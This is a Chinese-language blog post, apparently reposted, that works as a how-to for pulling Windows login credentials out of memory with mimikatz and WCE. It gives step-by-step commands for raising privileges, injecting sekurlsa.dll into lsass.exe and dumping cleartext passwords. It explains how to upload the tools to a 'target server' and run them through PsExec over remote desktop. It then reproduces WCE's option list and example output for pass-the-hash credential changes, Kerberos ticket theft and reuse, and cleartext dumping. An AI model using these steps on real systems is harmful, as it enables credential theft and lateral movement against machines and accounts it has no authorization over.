最新消息:

WIN服务器得明文密码神器 mimikatz、WCE

windows admin 4032浏览 0评论

一、mimikatz(自己亲试,可以在win7 x64下使用

昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下

还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

自己尝试了下用 win2008 r2 x64 来测试

09071549f

最后测试成功 wdigest 就是我的明文密码

我还测过密码复杂度在14位以上 

包含数字 大小写字母 特殊字符的密码

一样能抓出明文密码来

以前用 wce.exe 或 lslsass.exe 通常是只能从内存里顶多抓出active账号的 lm hash 和 ntlm hash

但用了这个神器抓出明文密码后

由此我们可以反推断 在 lsass.exe 里并不是只存有 lm hash 和 ntlm hash 而已

应该还存在有你的明文密码经过某种加密算法 (注意: 是加密算法 而不是hash算法 加密算法是可逆的 hash算法是不可逆的)

这样这个加密算法是可逆的 能被解密出明文 

所以进程注入 lsass.exe 时 所调用的 sekurlsa.dll 应该包含了对应的解密算法

逆向功底比较好的童鞋可以尝试去逆向分析一下

然后这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器

可以提升进程权限 注入进程 读取进程内存等等 

下面展示一个 读取扫雷游戏的内存的例子

090718d6h

我们还可以通过pause命令来挂起该进程 这个时候游戏的时间就静止了

090720zWr

总之这个神器相当华丽 还有更多能力有待各黑阔们挖掘 =..=~

使用方法:
1. 运行主程序:mimikatz.exe
2. 输入:privilege::debug      提升权限
3. 输入:inject::process lsass.exe sekurlsa.dll
将sekurlsa.dll  注入到lsass.exe 中
4. 输入:@getLogonPasswords   (注:此命令在我的win7 x64上没有用,可以通过sekurlsa::logonPasswords full命令来获取)
即可获取hash和当前用户的明文密码!

在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:

首先提取几个文件,只抓取密码的话,只需要这几个文件:

mimikatz_trunktoolsPsExec.exe
mimikatz_trunkWin32mimikatz.exe
mimikatz_trunkWin32sekurlsa.dll

打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。

然后使用以下任何一种方法即可抓取密码:

01 //最简单实用的方法,使用 PsExec.exe 启动。
02 //在本机启动交互式命令提示窗口
03 psexec \\127.0.0.1 “C:\WINDOWS\system32\cmd.exe”
04 //启动 mimikatz.exe
05 C:\mimikatz_trunk\Win32\mimikatz.exe
06 //提升权限
07 privilege::debug
08 //注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
09 inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
10 //抓取密码
11 @getLogonPasswords      或sekurlsa::logonPasswords full
12 //退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
13 exit

参考文章:http://hi.baidu.com/hackercasper/home
http://blog.gentilkiwi.com/mimikatz
http://pentestmonkey.net/blog/mi … asswords-from-lsass

 

二、WCE

获取明文密码只需一个命令:wce.exe  -w     (需要在命令行下以管理员身份运行)

20130724115850

Windows Credentials Editor (WCE)
Windows Credentials Editor (WCE) is a security tool that allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets). This tool can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.), obtain Kerberos tickets and reuse them in other Windows or Unix systems and dump cleartext passwords entered by users at logon. WCE is a security tool widely used by security professionals to assess the security of Windows networks via Penetration Testing. It supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)
Old Versions (x32): WCE v1.2 (download), WCE v1.1 (download), WCE v1.0 (download)
Old Versions (x64): WCE v1.21 (download), WCE v1.2 (download)
——–

Windows Credentials Editor provides the following options:
Options:
-l  List logon sessions and NTLM credentials (default).
-s  Changes NTLM credentials of current logon session.
Parameters: :::.
-r  Lists logon sessions and NTLM credentials indefinitely.
Refreshes every 5 seconds if new sessions are found.
Optional: -r.
-c  Run in a new session with the specified NTLM credentials.
Parameters: .
-e  Lists logon sessions NTLM credentials indefinitely.
Refreshes every time a logon event occurs.
-o  saves all output to a file.
Parameters: .
-i  Specify LUID instead of use current logon session.
Parameters: .
-d  Delete NTLM credentials from logon session.
Parameters: .
-a  Use Addresses.
Parameters:
-f  Force ‘safe mode’.
-g              Generate LM & NT Hash.
Parameters: .
-K              Dump Kerberos tickets to file (unix & ‘windows wce’ form
at)
-k              Read Kerberos tickets from file and insert into Windows
cache
-w  Dump cleartext passwords stored by the digest authentication package
-v  verbose output.
Examples:
* List current logon sessions

C:\>wce -l
meme:meme:11111111111111111111111111111111:11111111111111111111111111111111
* List current logon sessions with verbose output enabled

C:\>wce -l -v
Current Logon Session LUID: 00064081h
Logon Sessions Found: 8
WIN-REK2HG6EBIS\auser:NTLM
LUID:0006409Fh
WIN-REK2HG6EBIS\auser:NTLM
LUID:00064081h
NT AUTHORITY\ANONYMOUS LOGON:NTLM
LUID:00019137h
NT AUTHORITY\IUSR:Negotiate
LUID:000003E3h
NT AUTHORITY\LOCAL SERVICE:Negotiate
LUID:000003E5h
WORKGROUP\WIN-REK2HG6EBIS$:Negotiate
LUID:000003E4h
\:NTLM
LUID:0000916Ah
WORKGROUP\WIN-REK2HG6EBIS$:NTLM
LUID:000003E7h
00064081:meme:meme:11111111111111111111111111111111:11111111111111111111111111111111
* Change NTLM credentials associated with current logon session

C:\>wce -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
Changing NTLM credentials of current logon session (00064081h) to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!
* Add/Change NTLM credentials of a logon session (not the current one)

C:\>wce -i 3e5 -s auser:adomain:99999999999999999999999999999999:99999999999999999999999999999999
Changing NTLM credentials of logon session 000003E5h to:
Username: auser
domain: admin
LMHash: 99999999999999999999999999999999
NTHash: 99999999999999999999999999999999
NTLM credentials successfully changed!
* Delete NTLM credentials associated with a logon session

C:\>wce -d 3e5
NTLM credentials successfully deleted!
* Run WCE indefinitely, waiting for new credentials/logon sessions.
Refresh is performed every time a logon event is registered in the Event Log.

C:\>wce -e
* Run WCE indefinitely, waiting for new credentials/logon sessions
Refresh is every 5 seconds by default.

C:\>wce -r
* Run WCE indefinitely, waiting for new credentials/logon sessions, but refresh every 1 second (by default wce refreshes very 5 seconds)

C:\>wce -r5

* Generate LM & NT Hash.

C:\>wce -g test
Password:   test
Hashes:     01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
* Dump Kerberos tickets to file (unix & ‘windows wce’ format)

C:\>wce -K
Converting and saving TGT in UNIX format to file wce_ccache…
Converting and saving tickets in Windows WCE Format to file wce_krbtkts..
5 kerberos tickets saved to file ‘wce_ccache’.
5 kerberos tickets saved to file ‘wce_krbtkts’.
Done!
* Read Kerberos tickets from file and insert into Windows cache

C:\>wce -k
Reading kerberos tickets from file ‘wce_krbtkts’…
5 kerberos tickets were added to the cache.
Done!
* Dump cleartext passwords stored by the Digest Authentication package

C:\>wce -w
test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test

GETLSASRVADDR.EXE
—————–
This tool can be used to obtain automatically needed addresses for WCE
to be able to read logon sessions and NTLM credentials from memory.
Addresses obtained can then be used with WCE using the -A switch.
This tool requires the dlls symsrv.dll and dbghelp.dll available from the
“Debugging Tools for Windows” package.

Additional Information
———————-
* http://www.ampliasecurity.com/research.html
* http://www.ampliasecurity.com/research/wcefaq.html
* http://www.ampliasecurity.com/research/WCE_Internals_RootedCon2011_ampliasecurity.pdf
* http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
整理下常用的命令

【list NTLM credentials in memory】
wce.exe
wce.exe -o output.txt

【dump logon cleartext passwords】
wce.exe -w

【change my current NTLM credentials】
wce.exe -s :::

【create a new logon session and launch a program with new NTLM credentials】
wce.exe -s ::: -c

【generate NTLM hashes】
wce.exe -g

【Safe mode No injection】
wce.exe -f

 

 

转载请注明:jinglingshu的博客 » WIN服务器得明文密码神器 mimikatz、WCE


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (1)

  1. lsass.exe进程:Lsass.exe - You cannot end this process from Task Manager. This is the local security authentication server, and it generates the process responsible for authenticating users for the Winlogon service. This process is performed by using authentication packages such as the default Msgina.dll. If authentication is successful, Lsass generates the user's access token, which is used to launch the initial shell. Other processes that the user initiates inherit this token. 意思是说: 这是一个本地的安全授权服务,并且它会为使用winlogon服务的授权用户生成一个进程。这个进程是通过使用授权的包,例如默认的msgina.dll来执行的。如果授权是成功的,lsass就会产生用户的进入令牌,令牌别使用启动初始的shell 。其他的由用户初始化的进程会继承这个令牌的。
    admin7年前 (2013-07-24)回复